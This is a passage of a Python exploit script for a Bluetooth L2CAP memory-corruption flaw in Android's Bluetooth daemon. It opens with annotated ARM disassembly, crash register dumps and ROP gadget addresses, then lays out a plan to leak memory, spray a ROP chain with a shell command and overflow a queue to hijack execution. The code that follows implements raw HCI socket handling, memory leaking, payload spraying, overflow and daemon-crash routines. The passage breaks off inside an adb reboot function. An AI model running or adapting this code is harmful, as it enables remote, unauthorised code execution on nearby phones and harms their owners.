# .text:0x0010310E                 MOV             R4, R0                                       => Move R0 to R4                        => Set R4 = R0 = tL2C_LCB* p_lcb
# .text:0x00103110                 CBZ             R2, loc_10311C                               => Jump if R2 is null                   => Jump if BT_HDR* p_buf is null
# .text:0x00103112                 MOVS            R0, #0                                       => Move 0 to R0                         => 
# .text:0x00103114                 CBZ             R1, loc_103120                               => Jump if R1 is null                   => Jump if tL2C_CCB* p_ccb is null
# .text:0x00103116                 LDRH            R1, [R1,#0x2C]                               => Load R1 + 0x2C into R1               => Load R1 with p_ccb->local_cid
# .text:0x00103118                 MOVS            R7, #1                                       => Move 1 to R7                         => Set single_write = true
# .text:0x0010311A                 B               loc_103124                                   => Branch to loc_103124
# .text:0x00103124 loc_103124
# .text:0x00103124                 STRH            R1, [R2]                                     => Store R1 high into R2                => Set p_buf->event = p_ccb->local_cid
# .text:0x00103126                 MOV             R1, R2                                       => Move R2 to R1                        => Set R1 = R2 = BT_HDR* p_buf
# .text:0x00103128                 STRH            R0, [R2,#6]                                  => Store R0 into R2 + 0x6               => Set p_buf->layer_specific = 0
# .text:0x0010312A                 LDR             R0, [R4,#0x44]                               => Load R4 + 0x44 into R0               => Load R0 with list_t* p_lcb->link_xmit_data_q from R4 + 0x44
# .text:0x0010312C                 BL              list_append                                  => Branch with link to list_append
#
# Before the call to list_append function registers contains:
#
# - R0 = list_t* p_lcb->link_xmit_data_q object with the first payload
# - R1 and R2 = BT_HDR* p_buf object with the second payload
# - R4 = tL2C_LCB* p_lcb object with the first payload at 0x44
# - R7 = 1
#
# The disassembly of list_append function:
#
# .text:0x001298A0                 PUSH            {R4,R5,R7,LR}
# .text:0x001298A2                 SUB             SP, SP, #0x138
# .text:0x001298A4                 MOV             R4, R0                                       => Move R4 to R0                        => Set R4 = R0 = list_t* p_lcb->link_xmit_data_q
# .text:0x001298A6                 LDR             R0, =(stack_canary_1A2718 - 0x1298B0)
# .text:0x001298A8                 MOV             R5, R1                                       => Move R1 to R5                        => Set R5 = R1 = BT_HDR* p_buf
# .text:0x001298AA                 CMP             R4, #0                                       => Test R4 = 0                          => Test if list_t* p_lcb->link_xmit_data_q is null
# .text:0x001298AC                 ADD             R0, PC ; stack_canary_1A2718
# .text:0x001298AE                 LDR             R0, [R0]                                     => 
# .text:0x001298B0                 LDR             R0, [R0]                                     => 
# .text:0x001298B2                 STR             R0, [SP,#0x148+stack_canary]                 => 
# .text:0x001298B4                 BNE             loc_1298CA                                   => Test CMP                             => Jump if list_t* p_lcb->link_xmit_data_q is not null
# .text:0x001298CA loc_1298CA                                                                   => 
# .text:0x001298CA                 CBNZ            R5, loc_1298E0                               => Jump if R5 is not null               => Jump if BT_HDR* p_buf is null
# .text:0x001298E0 loc_1298E0                                                                   => 
# .text:0x001298E0                 LDR             R0, [R4,#0x10]                               => Load R0 from R4+0x10                 => Set R0 = list->allocator
# .text:0x001298E2                 LDR             R1, [R0]                                     => Load R1 from R0                      => Set R1 = list->allocator->alloc
# .text:0x001298E4                 MOVS            R0, #8                                       => Move 8 to R0                         => Set R0 = sizeof(list_node_t)
# .text:0x001298E6                 BLX             R1                                           => Branch with link and exchange to R1  => Branch to controlled R1 !!!
#
# Before the controlled branch to R1 registers contains:
# - R0 = 0x8
# - R1 = second payload value + 0x0
# - R2 and R5 point to BT_HDR* p_buff with the second payload
# - R4 point to list_t* p_lcb->link_xmit_data_q with the first payload
#
# 
# In order to find the start of the first payload in list_t* p_lcb->link_xmit_data_q pointed by R4 we used the ldm gadget found at 0x00125734:
# 
# 0x00125734 : ldm r4, {r0, r1, r2, r3, r5, r6, r7, sb, sl, ip, sp, lr, pc}
#
# The target crash with following register containts:
#
# - R4       = ade05278 = list_t* p_lcb->link_xmit_data_q with the first payload at + 0x894C (0x894C / 0x360 = 0x28 = 40 packets where we can access the second payload)
#
# - R0       = R4 + 0x0  = 0020de08
# - R1       = R4 + 0x4  = dead0000 = first payload value + 0x0
# - R2       = R4 + 0x8  = dead0001 = first payload value + 0x4
# - R3       = R4 + 0xC  = dead0002 = first payload value + 0x8
# - R5       = R4 + 0x10 = ade0db14 = first payload value + 0xC = address of second payload + 0x0
# - R6       = R4 + 0x14 = dead0003 = first payload value + 0x10
# - R7       = R4 + 0x18 = 00200004
# - R9  (SB) = R4 + 0x1C = dead0000 = first payload value + 0x0
# - R10 (SL) = R4 + 0x20 = dead0001 = first payload value + 0x4
# - R12 (IP) = R4 + 0x24 = dead0002 = first payload value + 0x8
# - R13 (SP) = R4 + 0x2C = ade0db14 = first payload value + 0xC = address of second payload+ 0x0
# - R14 (LR) = R4 + 0x30 = dead0003 = first payload value + 0x10
#
# The first payload is repeated each 0x14 bytes which is the size of list_t structure
#
# typedef struct list_t {
#   list_node_t* head;                                                | Size 0x4 | Offset 0x0  | l2cap header not usable
#   list_node_t* tail;                                                | Size 0x4 | Offset 0x4  | first payload value + 0x0
#   size_t length;                                                    | Size 0x4 | Offset 0x8  | first payload value + 0x4
#   list_free_cb free_cb;                                             | Size 0x4 | Offset 0xC  | first payload value + 0x8
#   const allocator_t* allocator;                                     | Size 0x4 | Offset 0x10 | first payload value + 0xC
# } list_t;                                                           | Size 0x14
#
#
# In order to find the start of the second payload in BT_HDR* p_buff pointed by R5 we used the ldm gadget found at 0x000dcecc:
# 
# 0x000dcecc : ldm r5, {r2, r3, r4, r6, r7, r8, lr, pc}
# 
# The target crash with following register containts:
#
# - R2 = R5 + 0x0  = 000e0000
# - R3 = R5 + 0x4  = 00000000
# - R4 = R5 + 0x8  = 000a2002
# - R5 = 95270300 = BT_HDR* p_buff with the second payload at + 0x???
# - R6 = R5 + 0xC = 00010006
# - R7 = R5 + 0x10 = 0002020a
# - R8 = R5 + 0x14 = 00000002
# 
# There is no increment in this load multiple and we can see that the containt of BT_HDR* p_buff + 0x0 is:
# 000e0000 00000000 000a2002 00010006 0002020a 00000002
# 
# The same test with a load multiple with increment before gadget found at 0x0014b580:
# 0x0014b580 : ldmib r5, {r1, r2, r3, r4, r7, r8, sl, fp, sp, pc} ^
# 
# The target crash with following log:
# 
# After the crash the registers contains:
# - R1 = R5 + 0x4  = 00000000
# - R2 = R5 + 0x8  = 000a2002
# - R3 = R5 + 0xC  = 00010006
# - R4 = R5 + 0x10 = 0002020a
# - R5 = 9530ee00 = BT_HDR* p_buff with the second payload at + 0x14
# - R7 = R5 + 0x14  = 96300002
# - R8 = R5 + 0x18  = dead0007
# - SL = R5 + 0x1C  = dead0008
# - FP = R5 + 0x20  = dead0009
# - SP = R5 + 0x24  = dead000a
# 
# The containt of BT_HDR* p_buff + 0x4 for the increment is:
# 00000000 000a2002 00010006 0002020a 96300002 dead0007 dead0008 dead0009 dead000a
#
# We can see that the second payload is at + 0x14 in BT_HDR* p_buff
#
##############################################################################################################################################################################
#
# WRITE THE ROP CHAIN
#
##############################################################################################################################################################################
#
# As Jan Ruge with the libicuuc library we only have access to dlsym in the bluetooth one to find the address of system in order to start the shell
#
# The exploit process is as follow:
#
# - Get a link transmit data buffer queue entry address at mem_offset 180 and compute base of a packet with - 176
# - Get BleAdvertisingManagerImpl::SetDataAdvDataSender function address at mem_offset 28 to compute the bluetooth library base address
# - Build a first payload of 32 characters containing the link transmit data buffer queue entry address
# - Build a second payload of 184 characters containing then ROP chain and the shell command
# - Spray the second payload at mem_offset 184 using leak method to place it in the link transmit data buffer queue
# - Overflow the first payload to overwrite entries in the link transmit data buffer queue and trigger the branch to the beginning of the second payload
# - Second payload start the shell command
#
# See code for explainations
#
##############################################################################################################################################################################


from __future__ import print_function

import os
import sys
import time
import json
import fcntl
import array
import random
import socket
import struct
import datetime
import capstone as cs
from elftools.elf import elffile
from binascii import hexlify, unhexlify
import bluetooth._bluetooth as _bt

# Check python 2 / 3
if os.name == 'posix' and sys.version_info[0] < 3:
    import subprocess32 as subprocess
    from thread import start_new_thread
else:
    import subprocess
    from _thread import start_new_thread
    xrange = range
    
# Variable declarations
target_mac = ""
target_ip = ""
shell_command = ""
disable_reboot = False
verbose = 0
force_verbose = False

link_xmit_data_q_entry_address = 0
bluetooth_library_base_address = 0
second_payload_base = 0

hci_echo = False
hci_handle = False
hci_socket = False
hci_l2cap_socket = False
hci_initialized = False
hci_crashing_deamon = False
hci_crash_counter = 0
hci_overflow_counter = 0
hci_connection_retry = 0
hci_initialization_retry = 0

max_hci_connection_retry = 10
max_hci_overflow_count = 3
max_hci_wait_time_deamon_restart = 8
max_hci_initialization_retry = 1

adb_activated = False
adb_logcat_file = ""
adb_logcat_crash_file = ""
adb_target_present = False
adb_target_crashed = False
adb_interesting_crash = False
adb_target_rebooting = False
adb_target_need_reboot = False
adb_shell_retry = 0
adb_get_logcat_retry = 0
adb_logcat_crash_count = 0

max_adb_shell_retry = 5
max_adb_get_logcat_retry = 5
max_adb_wait_time_connect = 10
max_adb_wait_time_reboot = 60

max_target_deamon_crash_count = 20

THUMB_MODE = 1

################################################################################
# Logger class allowing to save debug print to log file
################################################################################
class LoggerWriter(object):
    def __init__(self, log_file, full_log_file):
        self.terminal = sys.stdout
        self.last_message_wo_return = False
        self.log_file = log_file
        self.full_log_file = full_log_file

    def write(self, message):
        global verbose
        global force_verbose

        # Filter unwanted message
        if "Not connected" in message or "Disconnect failed" in message:
            return

        # Force verbose mean print_console => write to log file
        write_to_log = force_verbose
        
        # Clean script colors
        message.replace("\033[;31m", "")
        message.replace("\033[;32m", "")
        message.replace("\033[;33m", "")
        message.replace("\033[;34m", "")
        message.replace("\033[;0m", "")

        # Check verbose mode
        if verbose:
            force_verbose = True
            if message.endswith("\r"):
                message = message.replace("\r", "\n")

        # Check force verbose
        if force_verbose:
            # Check if last message ends with return
            if self.last_message_wo_return and not message.endswith("\r"):
                self.terminal.write(" "*160 + "\r")
                self.last_message_wo_return = False

            # Write message to terminal
            self.terminal.write(message)

            # Save flag if message ends with return
            if message.endswith("\r"):
                self.last_message_wo_return = True

        # Write only message with line return to log file
        if self.log_file and write_to_log and not self.last_message_wo_return and not message == "":
            message = datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S.%f : ") + message
            self.log_file.write(message)

        # Write message to full log file
        if self.full_log_file and not message == "":
            message = datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S.%f : ") + message
            self.full_log_file.write(message)

    def flush(self):
        if self.log_file:
            self.log_file.flush()
        if self.full_log_file:
            self.full_log_file.flush()
        self.terminal.flush()


################################################################################
# Function definitions
################################################################################
def print_logcat(logcat_line):
    global adb_logcat_file

    # Write line to logcat file
    if adb_logcat_file:
        adb_logcat_file.write(str(logcat_line))


def print_crash(crash_line):
    global adb_logcat_crash_file

    # Write line to logcat crash file
    if adb_logcat_crash_file:
        adb_logcat_crash_file.write(str(crash_line + "\n"))


def print_log(*args, **kwargs):
    global force_verbose

    # Don't write to terminal at all
    force_verbose = False

    # Print the message
    print(*args, **kwargs)
    force_verbose = False
    sys.stdout.flush()


def print_console(*args, **kwargs):
    global force_verbose

    # Write to terminal anyway
    force_verbose = True

    # Print the message
    print(*args, **kwargs)
    force_verbose = False
    sys.stdout.flush()


def raw_input_console(message):
    global force_verbose
    
    # Write to terminal anyway
    force_verbose = True
    raw_input(message)
    force_verbose = False
    sys.stdout.flush()


def pattern(n):
    return "".join([chr(i%255) for i in xrange(n)])


def valid_addr(echo):
    address = struct.unpack("L", echo)[0]
    return address < 0xC0000000 \
       and address > 0x80000000 \
       and echo not in pattern(300)

def convert_little_endian(text):
    ba = bytearray.fromhex(hexlify(text))
    ba.reverse()
    little_endian = ''.join(format(x, '02x') for x in ba)
    return little_endian

# Check if target is ready for exploit
def check_target_ready(check_adb=True, check_hci=True, check_adb_crash=True, check_hci_crash=True):
    global hci_handle
    global hci_socket
    global hci_l2cap_socket
    global hci_initialized
    global hci_crashing_deamon
    global adb_activated
    global adb_target_present
    global adb_target_rebooting
    global adb_target_need_reboot
    global adb_target_crashed

    # Check if adb is activated and target no more ready
    if check_adb and adb_activated and (not adb_target_present or adb_target_rebooting or adb_target_need_reboot):
        print_log("check_target_ready = False / check_adb: %d / adb_activated: %d / adb_target_present: %d / adb_target_rebooting: %d / adb_target_need_reboot: %d" % \
                 (check_adb, adb_activated, adb_target_present, adb_target_rebooting, adb_target_need_reboot))
        return False
    
    # Check if adb is activated and saw a crash
    if check_adb_crash and adb_activated and adb_target_crashed :
        print_log("check_target_ready = False / check_adb_crash: %d / adb_activated: %d / adb_target_crashed: %d" % \
                 (check_adb_crash, adb_activated, adb_target_crashed))
        return False

    # Check HCI initialized and hci_handle
    if check_hci and not (hci_initialized and hci_socket and hci_l2cap_socket and hci_handle):
        print_log("check_target_ready = False / check_hci: %d / hci_initialized: %d / hci_socket: %d / hci_l2cap_socket: %d / hci_handle: %d" % \
                 (check_hci, hci_initialized, not hci_socket == False, not hci_l2cap_socket == False, hci_handle))
        return False

    # Check if HCI is crashing the bluetooth deamon
    if check_hci_crash and hci_crashing_deamon :
        print_log("check_target_ready = False / check_hci_crash: %d / hci_crashing_deamon: %d" % \
                 (check_hci_crash, hci_crashing_deamon))
        return False

    return True


# Create Raw HCI connection to the bluetooth deamon
def do_connect_hci():
    global hci_socket

    try:
        # Connect Raw HCI socket
        print_console ("HCI: Connecting Raw HCI socket", end="\r")
        hci_socket = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_HCI)
        hci_socket.setsockopt(socket.SOL_HCI, socket.HCI_DATA_DIR,1)
        hci_socket.setsockopt(socket.SOL_HCI, socket.HCI_FILTER, ('\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00' if os.name == 'posix' and sys.version_info[0] < 3 else b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00'))
        hci_socket.bind((0,))
        
        return True
        
    except:
        pass
        
    return False


# Disconnect HCI connection to the bluetooth deamon
def do_disconnect_hci(timeout=2):
    global hci_handle
    global hci_socket

    # Disconnect Raw HCI socket
    try:
        if hci_socket:
            print_console ("HCI: Disconnecting Raw HCI socket", end="\r")
            hci_socket.close()
    except:
        pass

    # Reset vars
    hci_handle = False
    hci_socket = False
    
    # Wait timeout seconds
    time.sleep(timeout)


# Create L2CAP connection to the bluetooth deamon
def do_connect_l2cap(timeout=60):
    global target_mac
    global hci_handle
    global hci_l2cap_socket
    global hci_connection_retry
    global hci_overflow_counter

    # Increase connection retry
    hci_connection_retry += 1

    # Reset HCI connection handle
    hci_handle = False
    hci_l2cap_socket = False
    
    # Connect L2CAP socket
    if hci_overflow_counter:
        print_console ("HCI: Connecting target %s..." % target_mac, end="\r")
    else:
        print_console ("HCI: Connecting target %s..." % target_mac)
    try:
        # Connect the target
        hci_l2cap_socket = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_L2CAP)
        hci_l2cap_socket.settimeout(timeout)
        hci_l2cap_socket.connect((target_mac, 0))
    except:
        # Connection failed !!!
        print_console ("\033[;31mHCI: L2CAP Connection failed !!!\033[;0m")
        
        # Reset HCI connection handle
        hci_handle = False
        hci_l2cap_socket = False
        return False
    
    # Get the ACL connection handle
    print_console ("HCI: Getting ACL connection handle...", end="\r")
    hci_sock = _bt.hci_open_dev ()
    hci_fd = hci_sock.fileno ()
    reqstr = struct.pack ("6sB17s", _bt.str2ba (target_mac), _bt.ACL_LINK, ('\0' if os.name == 'posix' and sys.version_info[0] < 3 else b'\0') * 17)
    request = array.array ("b", reqstr)
    try:
        fcntl.ioctl (hci_fd, _bt.HCIGETCONNINFO, request, 1)
    except:
        print_console ("\033[;31mHCI: There is no ACL connection to %s\033[;00m" % target_mac)
        return False

    # Unpack the ACL connection handle
    hci_handle = struct.unpack ("8xH14x", request.tostring ())[0]
    if hci_overflow_counter:
        print_console ("\033[;32mHCI: Got ACL connection handle: 0x%x\033[;0m" % hci_handle, end="\r")
    else:
        print_console ("\033[;32mHCI: Got ACL connection handle: 0x%x\033[;0m" % hci_handle)
    
    # Reset connection retry
    hci_connection_retry = 0
    
    return True


# Disconnect L2CAP connection to the bluetooth deamon
def do_disconnect_l2cap(timeout=2):
    global hci_handle
    global hci_l2cap_socket

    # Disconnect L2CAP socket
    try:
        if hci_l2cap_socket:
            print_console ("HCI: Disconnecting L2CAP socket", end="\r")
            subprocess.check_output("hcitool dc " + target_mac, shell=True)
            hci_l2cap_socket.close()
    except:
        pass

    #Reset vars
    hci_handle = False
    hci_l2cap_socket = False
 
    # Wait timeout seconds
    time.sleep(timeout)


# Disconnect HCI and L2CAP sockets
def do_disconnect_all():
    # Disconnect raw HCI and L2CAP sockets
    do_disconnect_hci(timeout=0)
    do_disconnect_l2cap(timeout=0)


# Initialize HCI
def do_initialize_hci():
    global target_mac
    global hci_initialized
    
    # Check target already ready
    if check_target_ready():
        return True
    
    # Disconnect all sockets
    do_disconnect_all()
    
    # Initialize hci
    try:
        # Check hci already initialized
        print_console ("HCI: Initializing HCI...", end="\r")
        subprocess.check_output("hciconfig hci0 down", shell=True)
        subprocess.check_output("hciconfig hci0 up", shell=True)
        subprocess.check_output("hciconfig hci0 sspmode 0", shell=True)
    except:
        pass
    
    # Connect Raw HCI socket
    if do_connect_hci():      
        # Connect L2CAP socket
        if do_connect_l2cap():
            # Set HCI initialized
            hci_initialized = True            
            return True
    
    # Reset hci initialized flag
    hci_initialized = False
    return False


# L2CAP receive thread
def hci_thread():
    global hci_echo
    global hci_handle
    global hci_l2cap_socket
    global hci_overflow_counter

    # Main thread loop
    while True:
        try:
            # Check target ready
            if not check_target_ready(check_hci_crash=False):
                time.sleep(1)
                continue

            # Receive bytes from L2CAP socket
            if hci_l2cap_socket:
                pkt = hci_l2cap_socket.recv(10240) # Just something long.

                # Check received bytes
                if ord(pkt[0]) == 0x9:  # ECHO RESP
                    print_log ("ECHO %s" % hexlify(pkt))
                    hci_echo = pkt
                elif ord(pkt[0]) == 0x1:
                    print_log ("Rejected %s" % hexlify(pkt))
                else:
                    print_log ("Unknow %s" % hexlify(pkt))

        # Lost connection
        except:
            # Reset HCI connection handle and initialized
            hci_handle = False
            if not hci_overflow_counter:
                print_console ("\033[;31mHCI: Lost connection !!!\033[;00m")

            # Wait a bit before checking reconnection
            time.sleep(2)


# Send fragmented echo packets
def send_echo_hci(ident, x, l2cap_len_adj=0, first_packet=0, continuation_flags=0, delay=0.05):
    global hci_handle
    global hci_socket

    # Make sure we are connected
    if not check_target_ready(check_hci_crash=False):
        # Stop sending echo
        return

    l2cap_hdr = struct.pack("<BBH",0x8, ident, len(x) + l2cap_len_adj) #command identifier len
    acl_hdr = struct.pack("<HH", len(l2cap_hdr) + len(x) + l2cap_len_adj, 1) #len cid

    packet_handle = hci_handle
    if first_packet:
        packet_handle |= 1 << 13 # PB Flag: First Automatically Flushable Packet (2)
    if continuation_flags:
        packet_handle |= 1 << 12 # PB Flag: Continuing Fragment (1)
    hci_hdr = struct.pack("<HH", packet_handle, len(acl_hdr) + len(l2cap_hdr) + len(x)) #handle, len

    # Make sure we are connected
    if not check_target_ready(check_hci_crash=False):
        # Stop sending echo
        return

    # TODO: Fail with python3 => bytes and str
    #print_log ("send_echo_hci => data: %s" % hexlify("\x02" + hci_hdr + acl_hdr + l2cap_hdr + x))
    hci_socket.send("\x02" + hci_hdr + acl_hdr + l2cap_hdr + x)
    time.sleep(delay)


# Send fragemented echo packets with controlled length and wait for the echo
def do_leak(ident=0x10, dst="", src="", l2cap_len_adj=2, delay=0.05):
    global hci_echo

    # Reset echo
    hci_echo = False

    # Make sure we are still connected
    if not check_target_ready():
        return False

    # Send fragmented packets and wait echo
    send_echo_hci(ident, dst, l2cap_len_adj=l2cap_len_adj, first_packet=1, delay=delay)
    send_echo_hci(ident+1, src, continuation_flags=1, delay=delay)

    # Wait echo
    timeout = 100
    while not hci_echo and check_target_ready() and timeout > 0:
        time.sleep(0.01)
        timeout -= 1

    # Check timeout
    if timeout <= 0:
        print_log ("do_leak timeout")
        return False

    # Check target ready
    if not check_target_ready():
        print_log("do_leak target no more ready")
        return False

    return hci_echo


# Leak 4 bytes of memory by sending 60 echo fragmented packets with adjust length of 4 => memcpy of 0 len
def do_leak_address(pattern, mem_offset, address_len=4):
    ident = 0x10
    address_list = []
    malformed_echo = False
    
    for i in xrange(32):
        # Make sure we are still connected
        if not check_target_ready():
            break

        # Leak 4 bytes at mem_address
        leak = do_leak(ident=ident, dst=pattern*mem_offset, src="", l2cap_len_adj=4, delay=0)

        # Check if leak is well formed
        if leak and (len(leak) == 4 + mem_offset + 4):
            # Try to unpack the leaked data
            address = 0x0
            
            # Check length of address
            if (address_len == 1):
                leak = "\x000000" + leak[-4:-3]
            elif (address_len == 2):
                leak = "\x0000" + leak[-4:-2]
            elif (address_len == 3):
                leak = "\x00" + leak[-4:-1]
            elif (address_len == 4):
                leak = leak[-4:]

            try:
                # Try to unpack the address
                address = struct.unpack("L", leak)[0]

                # Check if we found an address
                if valid_addr(leak) \
                and hexlify(leak[1:]) != "000000" \
                and hexlify(leak[2:]) != "0000" \
                and address not in address_list:
                    # Append the found address in the return list
                    address_list.append(address)
                    print_log ("HCI: Found pointer to address 0x%08x at mem_offset %d" % (address, mem_offset))
                else:
                    print_log ("Skipping leak %s (0x%08x) at mem_offset %d" % (hexlify(leak[-4:]), address, mem_offset))
            except:
                pass

        elif leak:
            print_console ("\033[;31mHCI: Echo malformed\033[;0m")
            malformed_echo = True

        ident += 2
        if (ident >= 0xfa):
            ident = 0x10

    return [malformed_echo, address_list]


# Dump leaks at mem_offset and save it to a leak file
def do_dump_leaks(mem_offset, length):
    ident = 0x10

    # Check limits
    start = mem_offset - length
    if start <= 0:
        start = 0
    end = mem_offset + length
    if end > 634:
        end = 634
    length = end - start

    # Create and open the leak file
    cwd = os.getcwd()
    if not os.path.isdir(cwd + "/logs"):
        os.mkdir(cwd + "/logs")
    output_filename = cwd + "/logs/leak_exploit_" + datetime.datetime.now().strftime("%d-%m-%Y_%H-%M-%S.log")
    if os.path.exists(output_filename):
        output_filename = cwd + "/logs/leak_exploit_" + datetime.datetime.now().strftime("%d-%m-%Y_%H-%M-%S_1.log")
    leak_file = open(output_filename, "w")
    
    print_console ("\033[;33mHCI: Dumping leaks between mem_offset %d and %d...\033[;0m" % (start, end))
    print_console ("HCI: Saving leaks dump to file %s..." % output_filename, end="\r")
    
    # Write header
    leak_file.write ("Leaks dump file\n\n")
    leak_file.write ("link transmit data buffer queue address: 0x%08x\n" % link_xmit_data_q_entry_address)
    leak_file.write ("Library base address: 0x%08x\n" % bluetooth_library_base_address)
  
    # Getting leaks
    for i in xrange(start, end):
        # Make sure we are still connected
        if not check_target_ready():
            break

        # Get 32 leaks at this mem_offset
        leak_list = []
        leak_file.write("\n%04d : " % i)
        for j in xrange(16):
            print_console ("HCI: Dumping memory leak... %d/%d" % (i*16+j, length*2*16), end="\r")
            # Make sure we are still connected
            if not check_target_ready():
                break

            # Leak 4 bytes at mem_address
            leak = do_leak (ident=ident, dst="C"*i, src="", l2cap_len_adj=4, delay=0)

            # Check if leak is well formed
            if leak and (len (leak) == 4 + i + 4):
                # Add the leak to the list
                leak_list.append (leak[-4:])
                # Add the leak to the leak file
                leak_file.write (hexlify(leak[-4:]) + " ")

            ident += 2
            if (ident >= 0xfa):
                ident = 0x10
    
        # Write leak as string if at end of a line
        if len(leak_list) > 0:
            # Get leaks as string
            leak_string = "".join (map(lambda x: "." if ord(x)<0x20 or ord(x)>0x7e else x, "".join(leak_list)))
            
            # Add leak string to file
            leak_file.write (": %s" % leak_string)

    # Close the leak file
    leak_file.flush()
    leak_file.close()
    
    # Wait for bluetooth deamon to digest the dump
    print_console ("HCI: Waiting for bluetooth deamon to digest the leak dump...", end="\r")
    time.sleep(5)


# Spray 64 packets using leak method
def do_spray_packet_second_payload(second_paylaod):
    ident = 0x10
    
    for i in xrange(64):
        # Make sure we are still connected
        if not check_target_ready():
            break
        
        # Send fragmented echo packet
        do_leak(ident=ident, dst=second_paylaod, src="", l2cap_len_adj=4, delay=0.01)
        ident += 2
        if (ident >= 0xfa):
            ident = 0x10

        # Print message
        print_console ("HCI: Sending spray packet (%d/%d)" % (i, 64), end="\r")


# Overflow 512 packets by sending fragmented echo request with l2cap adjust of 2 to cause a mempcy of -2
def do_overflow_first_payload(first_payload):
    global hci_echo

    ident = 0x10
    # Send fragmented packets with adjust length of 2 to overflow the buffer but without crashing the bluetooth deamon
    for i in xrange(512):
        # Make sure we are still connected
        if not check_target_ready():
            break

        # Send fragmented packets
        hci_echo = False
        print_console ("\033[;34mHCI: Sending overflow packet... (%d/%d)\033[;0m" % (i, 512), end="\r")
        send_echo_hci(ident+1, "", l2cap_len_adj=2, first_packet=1, delay=0.0)
        send_echo_hci(ident+2, first_payload, continuation_flags=1, delay=0.005)

        ident += 3
        if (ident >= 0xfa):
            ident = 0x10

    # Check if we crash the bluetooth deamon
    if not check_target_ready():
        return True

    return False


# Crash the bluetooth deamon by sending short fragmented packets with adjust length of 1
def do_crash_bluetooth_deamon(spray_packet=True):
    global hci_echo
    global hci_handle
    global hci_socket
    global hci_l2cap_socket
    global hci_crashing_deamon
    global hci_initialized
    global hci_initialization_retry
    global hci_overflow_counter
    global hci_crash_counter
    global hci_connection_retry
    global bluetooth_library_base_address
    global link_xmit_data_q_entry_address
    global second_payload_base
    global adb_interesting_crash

    # Increase crash counter
    hci_crash_counter += 1
    
    # Check if we need to send crash packets
    if spray_packet:
        # Send fragmented packets with adjust length of 1 to crash the bluetooth deamon
        print_console ("\033[;33mCrashing the bluetooth deamon to refresh the memory (%d/%d)\033[;0m" % (hci_crash_counter, max_target_deamon_crash_count))
        ident = 0x10
        for i in xrange(160):
            # Make sure we are still connected
            if not check_target_ready():
                break
            hci_echo = False
            print_console ("HCI: Sending crash packet (%d/%d)%s" % (i, 160, " "*40), end="\r")
            send_echo_hci(ident, "DE", l2cap_len_adj=1, first_packet=1)
            send_echo_hci(ident+1, "AD", continuation_flags=1)

            # Check if we still receive echos
            timeout = 100
            while not hci_echo and check_target_ready(check_hci_crash=False) and timeout > 0:
                time.sleep(0.01)
                timeout -= 1
            if timeout <= 0:
                print_log ("do_crash_bluetooth_deamon OK")
                break
            ident += 2
            if (ident >= 0xfa):
                ident = 0x10
    
    # Set crashing deamon
    hci_crashing_deamon = True
    
    # Disconnect all sockets
    do_disconnect_all()
    
    # Wait for adb to see the crash
    time.sleep(3)
        
    # Reset variables
    hci_connection_retry = 0
    hci_overflow_counter = 0
    hci_initialized = False
    hci_initialization_retry = 0
    bluetooth_library_base_address = 0
    link_xmit_data_q_entry_address = 0
    second_payload_base = 0

    # Wait at least max_hci_wait_time_deamon_restart seconds to make sure target bluetooth deamon has restarted
    wait_counter = 0
    while True:
        # Check target ready
        if not check_target_ready(check_hci=False, check_adb_crash=False, check_hci_crash=False):
            break

        # Check crash counter
        if not disable_reboot and hci_crash_counter >= max_target_deamon_crash_count:
            break
        
        # Waiting for target bluetooth deamon to restart
        time.sleep(1)
        wait_counter += 1
        print_console ("HCI: Waiting for target bluetooth deamon to restart (%d seconds remaining)" % (max_hci_wait_time_deamon_restart - wait_counter), end="\r")
        if wait_counter >= max_hci_wait_time_deamon_restart:
            break

    # Reset crashing deamon
    hci_crashing_deamon = False
    adb_target_crashed = False
    adb_interesting_crash = False


# Connect to target with adb
def do_adb_connect(target_ip):
    # Build the adb connect command
    command = "adb connect " + target_ip + ":5555"

    try:
        # Execute the command in a subprocess
        output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT, bufsize=1, timeout=10)

        # Check the output of the command
        print_log("ADB connect output: %s" % output)
        
        if ('connected to' if os.name == 'posix' and sys.version_info[0] < 3 else b'connected to') in output \
        or ('already' if os.name == 'posix' and sys.version_info[0] < 3 else b'already') in output:
            return True
        elif ('error: device unauthorized' if os.name == 'posix' and sys.version_info[0] < 3 else b'error: device unauthorized') in output:
            print_console ("\033[;31mTarget not reacheable with adb shell\033[;0m\n\033[;33mKill adb server with adb kill-server \nReconnect target with adb connect %s:5555\033[;0m" % (target_ip))
            os._exit(1)
    except subprocess.TimeoutExpired:
        pass

    return False


# Connect to target with adb
def do_execute_adb_shell_cmd(command, timeout=2):
    global adb_shell_retry
    global max_adb_shell_retry
    
    output = []

    # Build the command with timeout to make sure it terminate after timeout seconds
    cmd = ["timeout", "-k", str(timeout)+"s", str(timeout)+"s", "adb", "shell", command]

    # Execute the command with adb shell in a subprocess
    p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1)
    print_log("ADB shell command: %s" % " ".join(cmd))

    # Read output of adb shell command
    for line in p.stdout:
        # Add all not blank line to result
        line = line.replace("\n", "")
        output.append(line)
        print_log("ADB shell output: %s" % line)

        # Check device not authorized in adb shell reply
        if ('error: device unauthorized' if os.name == 'posix' and sys.version_info[0] < 3 else b'error: device unauthorized') in line:
            adb_shell_retry += 1
            # Check number of getting logcat failed
            if adb_shell_retry > max_adb_shell_retry:
                print_console ("\033[;31mTarget not reacheable with adb shell\033[;0m\n\033[;33mKill adb server with adb kill-server\nReconnect target with adb connect %s:5555\033[;0m" % (target_ip))
                os._exit(1)
            time.sleep(1)

    return output


# Reboot the target using abd shell
def do_adb_reboot_target():
    global hci_echo
    global hci_handle
    global hci_socket
    global hci_l2cap_socket
    global hci_crashing_deamon
    global hci_initialized
    global hci_initialization_retry
    global hci_overflow_counter
    global hci_crash_counter
    global hci_connection_retry
    global adb_target_present
    global adb_target_crashed
    global adb_target_rebooting
    global adb_target_need_reboot
    global adb_interesting_crash
    global adb_shell_retry
    global adb_get_logcat_retry
    global adb_logcat_crash_count
    global bluetooth_library_base_address
    global link_xmit_data_q_entry_address
    global second_payload_base

    # Set disconnected and rebooting
    adb_target_present = False
